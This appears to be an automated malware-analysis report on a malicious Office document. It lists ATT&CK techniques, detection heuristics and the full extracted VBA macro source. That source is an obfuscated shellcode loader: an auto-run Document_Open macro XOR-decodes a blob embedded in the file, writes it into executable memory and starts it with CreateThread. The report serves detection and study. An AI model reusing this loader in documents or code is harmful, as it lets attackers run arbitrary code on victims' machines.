MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1055.012 Process Injection
The sample is a Microsoft Office document containing VBA macros. The macros utilize Windows API functions such as VirtualAlloc and CreateThread, indicating an attempt to allocate memory and execute arbitrary code. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' strongly suggests a downloader or loader functionality. The presence of these elements points to a malicious document designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() FtGCibuvnHgQ -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() Document_Open -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4875 bytes |
SHA-256: 9cf9dfbbcbdf91c0bcd4068803c2b8c42ab425915fb222163d79c8beb4bf379d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
38 of 73 identifiers look randomly generated (e.g. 'iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRN') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As LongPtr, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As LongPtr
Private Declare PtrSafe Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As LongPtr, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As LongPtr, ByVal CKNlCeujJMESeHWOAEgTpy As LongPtr, ByVal acnQfmGl As String, ByVal jamNzHXdIl As LongPtr, ByRef taWOzVJImeOveCNjpooW As LongPtr) As LongPtr
#Else
Private Declare Function nyihufQoVwZuSRqUwpxYnQN Lib "kernel32" Alias "CreateThread" (ByVal BrJdvj As Long, ByVal THdleSOagyrk As Long, ByVal XYhuFhkMxIOuoCRImL As Long, LuPEbD As Long, ByVal mNNdQXdtgCkox As Long, YCvZoRPpWrT As Long) As Long
Private Declare Function uFNLBWRvjdKEkYhfxjrCDahxA Lib "kernel32" Alias "VirtualAlloc" (ByVal gloOBlkrYXwffvGVik As Long, ByVal nOTGyIDnACVzEu As Long, ByVal XtcIcsTzObJP As Long, ByVal vcteoWJNmFQgXYK As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal cxRLPynSzicupfEOShSyjRlI As Long, ByVal CKNlCeujJMESeHWOAEgTpy As Long, ByVal acnQfmGl As String, ByVal jamNzHXdIl As Long, ByRef taWOzVJImeOveCNjpooW As Long) As Long
#End If
Const ercmlFbQwjOkTy = &H1000
Const TVyrAqVBTnpoiMRSrHpuihWswYzmm = &H40
Public Sub FtGCibuvnHgQ()
Dim SCQNfmCty() As Byte
SCQNfmCty = QzJErMGBSMbpQBfMtxZfKCPN(ActiveDocument.FullName)
Dim MIZsYPloAHKXaDyAvdhUfGzpx As String
MIZsYPloAHKXaDyAvdhUfGzpx = StrConv(SCQNfmCty, 64)
Dim aIcPEWhBTTiJwFbtFjzV
aIcPEWhBTTiJwFbtFjzV = Split(MIZsYPloAHKXaDyAvdhUfGzpx, "iWDeHshsaQPReEerUghpuRsVMmCYvreuTYuqkeRNOrUaLnlaOIxKrxjrDIruPiXJMuXfkNhPouBcXsjzbBkMTtdwOdNBNxXFulorpfQbBIwWVhtlzSsoYkPsqBqgaFcRwWILeSkWLjllXgAHJBcVe")
Dim npEQzlEMfjKVsPDmLc As String
Dim nckOLXenJWUTYC As String
Dim tFgjfxdjIkVmZQPIQEvROo As String
nckOLXenJWUTYC = StrConv(StrConv(aIcPEWhBTTiJwFbtFjzV(UBound(aIcPEWhBTTiJwFbtFjzV)), 64), 128)
tFgjfxdjIkVmZQPIQEvROo = Mid$(nckOLXenJWUTYC, 3, Len(nckOLXenJWUTYC))
npEQzlEMfjKVsPDmLc = iiGQsHQtgpasu("GjwWaOOJbVFEAYyHgGHwCPZ", tFgjfxdjIkVmZQPIQEvROo)
#If VBA7 Then
Dim OYrFFFECgdjQjYVqTdFr As LongPtr
Dim DDeQMZgUCQJonzqW As LongPtr
#Else
Dim OYrFFFECgdjQjYVqTdFr As Long
Dim DDeQMZgUCQJonzqW As Long
#End If
OYrFFFECgdjQjYVqTdFr = uFNLBWRvjdKEkYhfxjrCDahxA(0, Len(npEQzlEMfjKVsPDmLc), ercmlFbQwjOkTy, TVyrAqVBTnpoiMRSrHpuihWswYzmm)
DDeQMZgUCQJonzqW = NtWriteVirtualMemory(-1, OYrFFFECgdjQjYVqTdFr, npEQzlEMfjKVsPDmLc, Len(npEQzlEMfjKVsPDmLc), 0)
DDeQMZgUCQJonzqW = nyihufQoVwZuSRqUwpxYnQN(0, 0, OYrFFFECgdjQjYVqTdFr, 0, 0, 0)
End Sub
Public Function QzJErMGBSMbpQBfMtxZfKCPN(ByVal yOeQygUgKebDKneSKMZeTU As String) As Byte()
Dim nckOLXenJWUTYC As Long
Dim tFgjfxdjIkVmZQPIQEvROo() As Byte
nckOLXenJWUTYC = FreeFile
If LenB(Dir(yOeQygUgKebDKneSKMZeTU)) Then
Open yOeQygUgKebDKneSKMZeTU For Binary Access Read As nckOLXenJWUTYC
ReDim tFgjfxdjIkVmZQPIQEvROo(LOF(nckOLXenJWUTYC) - 1&) As Byte
Get nckOLXenJWUTYC, , tFgjfxdjIkVmZQPIQEvROo
Close nckOLXenJWUTYC
Else
Err.Raise 53
End If
QzJErMGBSMbpQBfMtxZfKCPN = tFgjfxdjIkVmZQPIQEvROo
Erase tFgjfxdjIkVmZQPIQEvROo
End Function
Public Sub Document_Open()
FtGCibuvnHgQ
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function iiGQsHQtgpasu(JOVjTCEQLexUndpCLWfnXbzGKBRQO As String, ZyvKgPzHUMNrxBtyuMeDEdmgaIpp As String) As String
Dim rKNbOfZzCWzddbtA As Long
Dim DXnmgeMlsVloJyAjiDbZ As String
Dim IwtZRQEzAcTG As Integer, TGTVzwLrNOsfNZFDlPhLKyisAdy As Integer, a As Long
For rKNbOfZzCWzddbtA = 1 To Len(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp)
a = rKNbOfZzCWzddbtA Mod Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
If a = 0 Then a = Len(JOVjTCEQLexUndpCLWfnXbzGKBRQO)
IwtZRQEzAcTG = Asc(Mid$(ZyvKgPzHUMNrxBtyuMeDEdmgaIpp, rKNbOfZzCWzddbtA, 1))
TGTVzwLrNOsfNZFDlPhLKyisAdy = Asc(Mid$(JOVjTCEQLexUndpCLWfnXbzGKBRQO, a, 1))
DXnmgeMlsVloJyAjiDbZ = DXnmgeMlsVloJyAjiDbZ + Chr(IwtZRQEzAcTG Xor TGTVzwLrNOsfNZFDlPhLKyisAdy)
Next rKNbOfZzCWzddbtA
iiGQsHQtgpasu = DXnmgeMlsVloJyAjiDbZ
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.